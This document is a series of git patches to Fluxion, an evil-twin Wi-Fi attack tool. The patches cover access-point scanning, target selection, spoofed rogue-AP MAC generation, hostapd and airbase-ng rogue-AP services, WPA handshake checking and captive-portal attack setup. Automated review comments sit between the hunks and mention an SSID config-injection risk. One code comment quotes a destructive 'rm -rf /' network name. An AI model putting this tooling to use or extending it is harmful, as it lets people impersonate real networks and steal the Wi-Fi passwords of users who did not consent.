"$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") fluxion_run_scanner $WIMonitor "" "abg" ;; - "$FLUXIONScannerChannelOptionSpecific") fluxion_set_scanner_channel ;; - "$FLUXIONGeneralBackOption") - fluxion_unset_interface - return 1 - ;; - esac - fi - - if [ $? 
-ne 0 ]; then return 1; fi -} - -function fluxion_set_scanner_channel() { - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONScannerChannelQuery" - echo - echo -e " $FLUXIONScannerChannelSingleTip ${CBlu}6$CClr " - echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1-5$CClr " - echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1,2,5-7,11$CClr " - echo - echo -ne "$FLUXIONPrompt" - - local channels - read channels - - echo - - fluxion_run_scanner $WIMonitor $channels - if [ $? -ne 0 ]; then return 1; fi -} - -# Parameters: monitor [ channel(s) [ band(s) ] ] -function fluxion_run_scanner() { - if [ ${#@} -lt 1 ]; then return 1; fi - - echo -e "$FLUXIONVLine $FLUXIONStartingScannerNotice" - echo -e "$FLUXIONVLine $FLUXIONStartingScannerTip" - - # Remove any pre-existing scanner results. - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - if [ "$FLUXIONAuto" ]; then - sleep 30 && killall xterm & - fi - - # Begin scanner and output all results to "dump-01.csv." - if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2>/dev/null; then - echo -e "$FLUXIONVLine$CRed $FLUXIONGeneralXTermFailureError" - sleep 5 - return 1 - fi - - # Fix this below, creating subshells for something like this is somewhat ridiculous. - local scannerResultsExist=$([ -f "$FLUXIONWorkspacePath/dump-01.csv" ] && echo true) - local scannerResultsReadable=$([ -s "$FLUXIONWorkspacePath/dump-01.csv" ] && echo true) - - if [ ! 
"$scannerResultsReadable" ]; then - if [ "$scannerResultsExist" ]; then - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - fi - - local choices=("$FLUXIONGeneralBackOption" "$FLUXIONGeneralExitOption") - io_query_choice "$FLUXIONScannerFailedNotice" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONGeneralBackOption") return 1 ;; - "$FLUXIONGeneralExitOption") - fluxion_exitmode - return 2 - ;; - esac - fi - - # Syntheize scan operation results from output file "dump-01.csv." - echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" - # Unfortunately, mawk (alias awk) does not support the {n} times matching operator. - # readarray TargetAPCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray TargetAPCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - # readarray TargetAPCandidatesClients < <(gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray TargetAPCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - - # Cleanup the workspace to prevent potential bugs/conflicts. 
- sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - if [ ${#TargetAPCandidates[@]} -eq 0 ]; then - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice" - sleep 3 - return 1 - fi -} - -###################################### < Target > ###################################### -function fluxion_unset_target_ap() { - APTargetSSID="" - APTargetChannel="" - APTargetEncryption="" - APTargetMAC="" - APTargetMakerID="" - APTargetMaker="" - APRogueMAC="" -} - -function fluxion_set_target_ap() { - if [ "$APTargetSSID" -a "$APTargetChannel" -a "$APTargetEncryption" -a \ - "$APTargetMAC" -a "$APTargetMakerID" -a "$APRogueMAC" ]; then - return 0 - fi - - fluxion_unset_target_ap - - local TargetAPCandidatesMAC=() - local TargetAPCandidatesClientsCount=() - local TargetAPCandidatesChannel=() - local TargetAPCandidatesSecurity=() - local TargetAPCandidatesSignal=() - local TargetAPCandidatesPower=() - local TargetAPCandidatesESSID=() - local TargetAPCandidatesColor=() - - for candidateAPInfo in "${TargetAPCandidates[@]}"; do - candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g") - - local i=${#TargetAPCandidatesMAC[@]} - - TargetAPCandidatesMAC[i]=$(echo "$candidateAPInfo" | cut -d , -f 1) - TargetAPCandidatesClientsCount[i]=$(echo "${TargetAPCandidatesClients[@]}" | grep -c "${TargetAPCandidatesMAC[i]}") - TargetAPCandidatesChannel[i]=$(echo "$candidateAPInfo" | cut -d , -f 4) - TargetAPCandidatesSecurity[i]=$(echo "$candidateAPInfo" | cut -d , -f 6) - TargetAPCandidatesPower[i]=$(echo "$candidateAPInfo" | cut -d , -f 9) - TargetAPCandidatesColor[i]=$([ ${TargetAPCandidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr) - - # Parse any non-ascii characters by letting bash handle them. - # Just escape all single quotes in ESSID and let bash's $'...' handle it. 
- local sanitizedESSID=$(echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14) - TargetAPCandidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'") - - local power=${TargetAPCandidatesPower[i]} - if [ $power -eq -1 ]; then - # airodump-ng's man page says -1 means unsupported value. - TargetAPCandidatesQuality[i]="??" - elif [ $power -le $FLUXIONNoiseFloor ]; then - TargetAPCandidatesQuality[i]=0 - elif [ $power -gt $FLUXIONNoiseCeiling ]; then - TargetAPCandidatesQuality[i]=100 - else - # Bash doesn't support floating point division, so I gotta work around it... - # The function is Q = ((P - F) / (C - F)); Q - quality, P - power, F - floor, C - Ceiling. - TargetAPCandidatesQuality[i]=$(((${TargetAPCandidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10))) - fi - done - - local headerTitle=$( - format_center_literals "WIFI LIST" - echo -n "$FormatCenterLiterals\n\n" - ) - - format_apply_autosize "$CRed[$CSYel ** $CClr$CRed]$CClr %-*.*s %4s %3s %3s %2s %-8.8s %18s\n" - local headerFields=$(printf "$FormatApplyAutosize" "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID") - - format_apply_autosize "$CRed[$CSYel%03d$CClr$CRed]%b %-*.*s %3s%% %3s %3d %2s %-8.8s %18s\n" - io_query_format_fields "$headerTitle$headerFields" "$FormatApplyAutosize" \ - TargetAPCandidatesColor[@] \ - TargetAPCandidatesESSID[@] \ - TargetAPCandidatesQuality[@] \ - TargetAPCandidatesPower[@] \ - TargetAPCandidatesClientsCount[@] \ - TargetAPCandidatesChannel[@] \ - TargetAPCandidatesSecurity[@] \ - TargetAPCandidatesMAC[@] - - echo - - APTargetSSID=${IOQueryFormatFields[1]} - APTargetChannel=${IOQueryFormatFields[5]} - APTargetEncryption=${IOQueryFormatFields[6]} - APTargetMAC=${IOQueryFormatFields[7]} - APTargetMakerID=${APTargetMAC:0:8} - APTargetMaker=$(macchanger -l | grep ${APTargetMakerID,,} | cut -d ' ' -f 5-) - - # Sanitize network ESSID to normalize it and make it safe for manipulation. - # Notice: Why remove these? 
Because some smartass might decide to name their - # network something like "; rm -rf / ;". If the string isn't sanitized accidentally - # shit'll hit the fan and we'll have an extremely distressed person subit an issue. - # Removing: ' ', '/', '.', '~', '\' - APTargetSSIDClean=$(echo "$APTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g') - - # We'll change a single hex digit from the target AP's MAC address. - # This new MAC address will be used as the rogue AP's MAC address. - local APRogueMACChange=$(printf %02X $((0x${APTargetMAC:13:1} + 1))) - APRogueMAC="${APTargetMAC::13}${APRogueMACChange:1:1}${APTargetMAC:14:4}" -} - -function fluxion_show_ap_info() { - format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" - - local colorlessFormat="$FormatApplyAutosize" - local colorfullFormat=$(echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g') - - printf "$colorlessFormat" "" "ESSID" "\"$APTargetSSID\" / $APTargetEncryption" "" - printf "$colorlessFormat" "" "Channel" "$APTargetChannel" "" - printf "$colorfullFormat" "" "BSSID" "$APTargetMAC ($CYel${APTargetMaker:-UNKNOWN}$CClr)" "" - - echo -} - -#################################### < AP Service > #################################### -function fluxion_unset_ap_service() { - APRogueService="" -} - -function fluxion_set_ap_service() { - if [ "$APRogueService" ]; then return 0; fi - - fluxion_unset_ap_service - - if [ "$FLUXIONAuto" ]; then - APRogueService="hostapd" - else - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONAPServiceQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONAPServiceHostapdOption" "$FLUXIONAPServiceAirbaseOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONAPServiceHostapdOption") APRogueService="hostapd" ;; - "$FLUXIONAPServiceAirbaseOption") APRogueService="airbase-ng" ;; - "$FLUXIONGeneralBackOption") - fluxion_unset_ap_service 
- return 1 - ;; - *) - fluxion_conditional_bail - return 1 - ;; - esac - fi - - # AP Service: Load the service's helper routines. - source "lib/ap/$APRogueService.sh" -} - -###################################### < Hashes > ###################################### -function fluxion_check_hash() { - if [ ! -f "$APTargetHashPath" -o ! -s "$APTargetHashPath" ]; then - echo -e "$FLUXIONVLine $FLUXIONHashFileDoesNotExistError" - sleep 3 - return 1 - fi - - local verifier - - if [ "$FLUXIONAuto" ]; then - verifier="pyrit" - else - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONHashVerificationMethodPyritOption") verifier="pyrit" ;; - "$FLUXIONHashVerificationMethodAircrackOption") verifier="aircrack-ng" ;; - "$FLUXIONGeneralBackOption") return 1 ;; - esac - fi - - hash_check_handshake "$verifier" "$APTargetHashPath" "$APTargetSSID" "$APTargetMAC" >$FLUXIONOutputDevice - local hashResult=$? - - # A value other than 0 means there's an issue with the hash. 
- if [ $hashResult -ne 0 ]; then echo -e "$FLUXIONVLine $FLUXIONHashInvalidError" - else echo -e "$FLUXIONVLine $FLUXIONHashValidNotice" - fi - - sleep 3 - - if [ $hashResult -ne 0 ]; then return 1; fi -} - -function fluxion_set_hash_path() { - fluxion_header - echo - echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileQuery" - echo - echo -ne "$FLUXIONAbsolutePathInfo: " - read APTargetHashPath -} - -function fluxion_unset_hash() { - APTargetHashPath="" -} - -function fluxion_set_hash() { - if [ "$APTargetHashPath" ]; then return 0; fi - - fluxion_unset_hash - - # Scan for an existing hash for potential use, if one exists, - # ask the user if we should use it, or to skip it. - if [ -f "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" -a \ - -s "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" ]; then - - if [ ! "$FLUXIONAuto" ]; then - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - printf "Path: %s\n" "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" - echo -ne "$FLUXIONVLine ${CRed}$FLUXIONUseFoundHashQuery$CClr [${CWht}Y$CClr/n] " - - read APTargetHashPathConsidered - - echo - fi - - if [ "$APTargetHashPathConsidered" = "" -o "$APTargetHashPathConsidered" = "y" -o "$APTargetHashPathConsidered" = "Y" ]; then - APTargetHashPath="$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" - fluxion_check_hash - # If the user decides to go back, we must unset. - if [ $? -ne 0 ]; then - fluxion_unset_hash - return 1 - fi - fi - fi - - # If the hash was not found, or if it was skipped, - # ask for location or for gathering one. - while [ ! -f "$APTargetHashPath" -o ! 
-s "$APTargetHashPath" ]; do - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONHashSourceQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONHashSourcePathOption" "$FLUXIONHashSourceRescanOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONHashSourcePathOption") - fluxion_set_hash_path - fluxion_check_hash - ;; - "$FLUXIONHashSourceRescanOption") fluxion_set_hash ;; # Rescan checks hash automatically. - "$FLUXIONGeneralBackOption") - fluxion_unset_hash - return 1 - ;; - esac - - # This conditional is required for return values - # of operation performed in the case statement. - if [ $? -ne 0 ]; then - fluxion_unset_hash - return 1 - fi - done - - # Copy to workspace for hash-required operations. - cp "$APTargetHashPath" "$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap" -} - -###################################### < Attack > ###################################### -function fluxion_unset_attack() { - if [ "$FLUXIONAttack" ]; then unprep_attack - fi - FLUXIONAttack="" -} - -# Select the attack strategy to be used. 
-function fluxion_set_attack() { - if [ "$FLUXIONAttack" ]; then return 0; fi - - fluxion_unset_attack - - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONAttackQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - #local attacksMeta=$(head -n 3 attacks/*/language/$FLUXIONLanguage.sh) - - #local attacksIdentifier - #readarray -t attacksIdentifier < <("`echo "$attacksMeta" | grep -E "^# identifier: " | sed -E 's/# \w+: //'`") - - #local attacksDescription - #readarray -t attacksDescription < <("`echo "$attacksMeta" | grep -E "^# description: " | sed -E 's/# \w+: //'`") - - local attacks - readarray -t attacks < <(ls -1 attacks) - - local descriptions - readarray -t descriptions < <(head -n 3 attacks/*/language/$FLUXIONLanguage.sh | grep -E "^# description: " | sed -E 's/# \w+: //') - - local identifiers=() - - local attack - for attack in "${attacks[@]}"; do - local identifier="$(head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | grep -E "^# identifier: " | sed -E 's/# \w+: //')" - if [ "$identifier" ]; then identifiers+=("$identifier") - else identifiers+=("$attack") - fi - done - - attacks+=("$FLUXIONGeneralBackOption") - identifiers+=("$FLUXIONGeneralBackOption") - descriptions+=("") - - io_query_format_fields "" "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" attacks[@] identifiers[@] descriptions[@] - - echo - - if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralBackOption" ]; then - fluxion_unset_target_ap - fluxion_unset_attack - return 1 - fi - - FLUXIONAttack=${IOQueryFormatFields[0]} - - # Load attack and its corresponding language file. - source "attacks/$FLUXIONAttack/language/$FLUXIONLanguage.sh" - source "attacks/$FLUXIONAttack/attack.sh" - - prep_attack - - if [ $? 
-ne 0 ]; then - fluxion_unset_attack - return 1 - fi -} - -# Attack -function fluxion_run_attack() { - start_attack - - local choices=("$FLUXIONSelectAnotherAttackOption" "$FLUXIONGeneralExitOption") - io_query_choice "$(io_dynamic_output $FLUXIONAttackInProgressNotice)" choices[@] - - echo - - # IOQueryChoice is a global, meaning, its value is volatile. - # We need to make sure to save the choice before it changes. - local choice="$IOQueryChoice" - - stop_attack - - if [ "$choice" = "$FLUXIONGeneralExitOption" ]; then fluxion_handle_exit; fi - - fluxion_unset_attack -} - -################################### < FLUXION Loop > ################################### -fluxion_set_resolution -fluxion_set_language - -while true; do - fluxion_set_interface - if [ $? -ne 0 ]; then continue; fi - fluxion_set_scanner - if [ $? -ne 0 ]; then continue; fi - fluxion_set_target_ap - if [ $? -ne 0 ]; then continue; fi - fluxion_set_attack - if [ $? -ne 0 ]; then continue; fi - fluxion_run_attack - if [ $? -ne 0 ]; then continue; fi -done - -# FLUXSCRIPT END From eadfceeae7357c4a6071dc7761ceddc4359a673d Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Thu, 18 Jan 2018 01:14:32 -0600 Subject: [PATCH 24/45] Upgraded AP services for Fluxion V4. --- lib/ap/airbase-ng.sh | 76 +++++++++++++++++++++++++++++++------------- lib/ap/hostapd.sh | 74 ++++++++++++++++++++++++++---------------- 2 files changed, 100 insertions(+), 50 deletions(-) diff --git a/lib/ap/airbase-ng.sh b/lib/ap/airbase-ng.sh index 802e3e4..c32c58f 100755 --- a/lib/ap/airbase-ng.sh +++ b/lib/ap/airbase-ng.sh 
@@ -3,55 +3,87 @@ # ================================================================ # Configuration Section # ================================================================ -VIGW="at0" -VIAP=$WIAccessPoint - -# airbase-ng uses a monitor-mode virtual interface -# and creates a separate interface, atX, for dhcpd. -VIAPAddress="$VIGWNetwork.2" - -# APServiceConfigDirectory=$FLUXIONWorkspacePath +#APServiceConfigDirectory=$FLUXIONWorkspacePath # ================================================================ #if [ "$APServiceVersion" ]; then return 0; fi #readonly APServiceVersion="1.0" -function ap_stop() { - if [ "$APServicePID" ]; then kill $APServicePID &>$FLUXIONOutputDevice +function ap_service_stop() { + if [ "$APServicePID" ]; then + kill $APServicePID &> $FLUXIONOutputDevice fi APServicePID="" } -function ap_reset() { - ap_stop +function ap_service_reset() { + ap_service_stop + + APServiceAccessInterface="" + + APServiceChannel="" + APServiceMAC="" + APServiceSSID="" + APServiceInterfaceAddress="" + APServiceInterface="" } -function ap_route() { - ifconfig $VIAP $VIAPAddress netmask 255.255.255.0 - sysctl net.ipv6.conf.at0.disable_ipv6=1 &>$FLUXIONOutputDevice +function ap_service_route() { + local networkSubnet=${APServiceInterfaceAddress%.*} + local networkAddress=$(( ( ${APServiceInterfaceAddress##*.} + 1 ) % 255 )) + + if [ $hostID -eq 0 ]; then + let hostID++ + fi + + # TODO: Dynamically get the airbase-ng tap interface & use below. + # WARNING: Notice the interface below is STATIC, it'll break eventually! + if ! ifconfig "at0" $networkSubnet.$networkAddress \ + netmask 255.255.255.0; then + return 1 + fi + + if ! 
sysctl net.ipv6.conf.at0.disable_ipv6=1 &> $FLUXIONOutputDevice; then + return 2 + fi } -function ap_prep() { - ap_stop +function ap_service_prep() { + if [ ${#@} -lt 5 ]; then return 1; fi + + APServiceInterface=$1 + APServiceInterfaceAddress=$2 + APServiceSSID=$3 + APServiceMAC=$4 + APServiceChannel=$5 + + ap_service_stop # Spoof virtual interface MAC address. # This is done by airbase-ng automatically. + + # airbase-ng uses a monitor-mode virtual interface + # and creates a separate interface, atX, for dhcpd. + APServiceAccessInterface="at0" } -function ap_start() { - ap_stop +function ap_service_start() { + ap_service_stop - xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" -title "FLUXION AP Service [airbase-ng]" -e airbase-ng -P -e $APTargetSSID -c $APTargetChannel -a $APRogueMAC $VIAP & + xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \ + -title "FLUXION AP Service [airbase-ng]" -e \ + airbase-ng -P -e $APServiceSSID -c $APServiceChannel \ + -a $APServiceMAC $APServiceInterface & local parentPID=$! - # Wait till airebase-ng has started and created the extra virtual interface. + # Wait till airebase-ng starts and creates the extra virtual interface. while [ ! "$APServicePID" ]; do sleep 1 APServicePID=$(pgrep -P $parentPID) done - ap_route + ap_service_route } # FLUXSCRIPT END diff --git a/lib/ap/hostapd.sh b/lib/ap/hostapd.sh index 14d26c9..93438ed 100755 --- a/lib/ap/hostapd.sh +++ b/lib/ap/hostapd.sh 
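Review bot: In `ap_service_route` of lib/ap/airbase-ng.sh the zero guard tests `$hostID`, which is not assigned anywhere in this hunk; the value computed just above it is `networkAddress`. If `hostID` is indeed unset, `[ $hostID -eq 0 ]` is a test error and the increment never runs, so a last octet of 254 gives `(254 + 1) % 255 = 0` and the tap interface is assigned the `.0` address. The guard should read `if [ "$networkAddress" -eq 0 ]; then networkAddress=1; fi`. Separately, `ap_service_start` passes `$APServiceSSID` unquoted after `-e`, so a network name containing spaces is split into extra airbase-ng arguments; write it as `-e "$APServiceSSID"`.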
@@ -3,69 +3,87 @@ # ================================================================ # Configuration Section # ================================================================ -VIGW=$WIAccessPoint -VIAP=$WIAccessPoint - -# HostAPD sets the virtual interface mode -# to master, which is supported by dhcpd. -VIAPAddress=$VIGWAddress - APServiceConfigDirectory=$FLUXIONWorkspacePath # ================================================================ #if [ "$APServiceVersion" ]; then return 0; fi #readonly APServiceVersion="1.0" -function ap_stop() { - if [ "$APServicePID" ]; then kill $APServicePID &>$FLUXIONOutputDevice +function ap_service_stop() { + if [ "$APServicePID" ]; then + kill $APServicePID &> $FLUXIONOutputDevice fi APServicePID="" } -function ap_reset() { - ap_stop +function ap_service_reset() { + ap_service_stop # Reset MAC address to original. - ifconfig $VIAP down + ifconfig $APServiceInterface down sleep 0.5 - macchanger -p $VIAP &>$FLUXIONOutputDevice + macchanger -p $APServiceInterface &> $FLUXIONOutputDevice sleep 0.5 - ifconfig $VIAP up + ifconfig $APServiceInterface up sleep 0.5 + + APServiceAccessInterface="" + + APServiceChannel="" + APServiceMAC="" + APServiceSSID="" + APServiceInterfaceAddress="" + APServiceInterface="" + } -function ap_route() { - echo "APService: No custom routes for hostapd" >$FLUXIONOutputDevice +function ap_service_route() { + echo "APService: No custom routes for hostapd" > $FLUXIONOutputDevice } -function ap_prep() { - ap_stop +function ap_service_prep() { + if [ ${#@} -lt 5 ]; then return 1; fi + + APServiceInterface=$1 + APServiceInterfaceAddress=$2 + APServiceSSID=$3 + APServiceMAC=$4 + APServiceChannel=$5 + + ap_service_stop # Prepare the hostapd config file. 
echo "\ -interface=$VIAP +interface=$APServiceInterface driver=nl80211 -ssid=$APTargetSSID -channel=$APTargetChannel" >"$APServiceConfigDirectory/$APRogueMAC-hostapd.conf" +ssid=$APServiceSSID +channel=$APServiceChannel" \ + > "$APServiceConfigDirectory/$APServiceMAC-hostapd.conf" # Spoof virtual interface MAC address. - ifconfig $VIAP down + ifconfig $APServiceInterface down sleep 0.5 - macchanger --mac=$APRogueMAC $VIAP &>$FLUXIONOutputDevice + macchanger --mac=$APServiceMAC $APServiceInterface &> $FLUXIONOutputDevice sleep 0.5 - ifconfig $VIAP up + ifconfig $APServiceInterface up sleep 0.5 + + # HostAPD sets the virtual interface mode + # to master, which is supported by dhcpd. + APServiceAccessInterface=$APServiceInterface } -function ap_start() { - ap_stop +function ap_service_start() { + ap_service_stop - xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" -title "FLUXION AP Service [hostapd]" -e hostapd "$APServiceConfigDirectory/$APRogueMAC-hostapd.conf" & + xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \ + -title "FLUXION AP Service [hostapd]" -e \ + hostapd "$APServiceConfigDirectory/$APServiceMAC-hostapd.conf" & local parentPID=$! # Wait till hostapd has started and its virtual interface is ready. @@ -74,7 +92,7 @@ function ap_start() { APServicePID=$(pgrep -P $parentPID) done - ap_route + ap_service_route } # FLUXSCRIPT END From 32466ef94e0d7e526873b22a7327f4ed6818cd6a Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Thu, 18 Jan 2018 01:16:47 -0600 Subject: [PATCH 25/45] Minor bug fix and removal of outdated content. --- fluxion | 52 +++++--------------------------------------------- language/en.sh | 4 ---- 2 files changed, 5 insertions(+), 51 deletions(-) diff --git a/fluxion b/fluxion index eabed45..a59906e 100755 --- a/fluxion +++ b/fluxion 
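Review bot: `ap_service_prep` in lib/ap/hostapd.sh writes `ssid=$APServiceSSID` into the hostapd config without checking the value. The callers are outside this hunk, but if the SSID comes from scan results, a name containing a line break would add further directives to a file that hostapd then loads. Reject such values before the `echo`, for example `case "$APServiceSSID" in *[[:cntrl:]]*) return 1 ;; esac`. The `ifconfig` and `macchanger` calls in `ap_service_prep` and `ap_service_reset` also take `$APServiceInterface` unquoted and ignore failures, unlike the checked calls in the airbase-ng `ap_service_route`; quoting the variable and returning non-zero on failure would make the two services behave alike.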
@@ -1504,9 +1504,11 @@ fluxion_prep_attack() { if [ ! -x "$path/language/$FluxionLanguage.sh" ]; then return 2; fi # Load attack and its corresponding language file. - # Notice: If the attack is a targetted attack, sourcing - # will define the constant FLUXIONAttackTargetted. - source "$path/language/$FluxionLanguage.sh" + # Load english by default to overwrite globals that ARE defined. + source "$path/language/en.sh" + if [ "$FluxionLanguage" != "en" ]; then + source "$path/language/$FluxionLanguage.sh" + fi source "$path/attack.sh" # Check if attack is targetted & set the attack target if so. @@ -1544,20 +1546,6 @@ fluxion_run_attack() { } -# ============================================================ # -# =================== < Test Subroutines > =================== # -# ============================================================ # -subtest1() { - local interface - interface_list_all - for interface in "${InterfaceListAll[@]}"; do - if [ "$interface" = "lo" ]; then continue; fi - echo "$interface" - done -} - - - # ============================================================ # # ================= < Argument Executables > ================= # # ============================================================ # 
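Review bot: The added `source "$path/language/en.sh"` runs without any check that the file exists, while the guard on the context line above it only tests the selected language file. If an attack ships without `en.sh`, the `source` fails, the function carries on, and the attack's message globals stay undefined for any string the selected language does not provide. Add `if [ ! -r "$path/language/en.sh" ]; then return 2; fi` before it. The existing guard also tests `-x`, although a sourced file only needs to be readable. `fluxion_prep_attack` begins and ends outside the hunk.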
@@ -1566,36 +1554,6 @@ eval set -- "$FLUXIONCLIArguments" # Set environment parameters. while [ "$1" != "--" ]; do case "$1" in -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; - --test) - while true; do - fluxion_get_interface subtest1 - result=$? - if [ $result -ne 0 ]; then - echo Failed to get interface with code $result - exit - fi - - fluxion_allocate_interface "$FluxionInterfaceSelected" - result=$? - if [ $result -ne 0 ]; then - echo Failed to allocate "$FluxionInterfaceSelected" with code $result - exit - fi - interfaceA=${FluxionInterfaces["$FluxionInterfaceSelected"]} - - echo "Allocated $FluxionInterfaceSelected -> $interfaceA" - - fluxion_get_target $interfaceA - result=$? - if [ $result -ne 0 ]; then - echo Failed to get target with code $result - exit - fi - - fluxion_target_show - done - exit - ;; esac shift # Shift new parameters done diff --git a/language/en.sh b/language/en.sh index a540dea..0062403 100755 --- a/language/en.sh +++ b/language/en.sh @@ -53,10 +53,6 @@ FLUXIONScannerChannelMiltipleTip="Multiple channels" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerHeader="FLUXION Scanner" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONAPServiceQuery="Select an access point service" -FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)" -FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" -# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Select a method to retrieve the handshake" FLUXIONHashSourcePathOption="Path to capture file" FLUXIONHashSourceRescanOption="Rescan handshake directory" From 51c35d470fabbe19aae32c6c824d2492677f98c0 Mon Sep 17 00:00:00 2001 
From: Matias Barcenas Date: Thu, 18 Jan 2018 01:17:26 -0600 Subject: [PATCH 26/45] Implemented missing AP service selection & bug fixes. --- attacks/Captive Portal/attack.sh | 128 +++++++++++++++++++------- attacks/Captive Portal/language/en.sh | 4 + 2 files changed, 101 insertions(+), 31 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index dd109ba..4e0f64a 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -16,8 +16,8 @@ CaptivePortalAuthenticationMethodsInfo=( # ============= < Virtual Network Configuration > ============ # # To avoid collapsing with an already existing network, # we'll use a somewhat uncommon network and server IP. -CaptivePortalVIGWAddress="192.168.254.1" -CaptivePortalVIGWNetwork=${CaptivePortalVIGWAddress%.*} +CaptivePortalGatewayAddress="192.168.254.1" +CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*} # ============================================================ # 
@@ -103,6 +103,65 @@ captive_portal_set_ap_interface() { fi } +function captive_portal_unset_ap_service() { + if [ ! "$CaptivePortalAPService" ]; then return 1; fi + + CaptivePortalAPService="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi + + if ! interface_is_wireless "$CaptivePortalAPInterface"; then + return 3; + fi +} + +function captive_portal_set_ap_service() { + if [ "$CaptivePortalAPService" ]; then return 0; fi + if ! interface_is_wireless "$CaptivePortalAPInterface"; then + return 0; + fi + + captive_portal_unset_ap_service + + if [ "$FLUXIONAuto" ]; then + CaptivePortalAPService="hostapd" + else + fluxion_header + + echo -e "$FLUXIONVLine $CaptivePortalAPServiceQuery" + echo + + fluxion_target_show + + local choices=( + "$CaptivePortalAPServiceHostapdOption" + "$CaptivePortalAPServiceAirbaseOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "" choices[@] + + echo + + 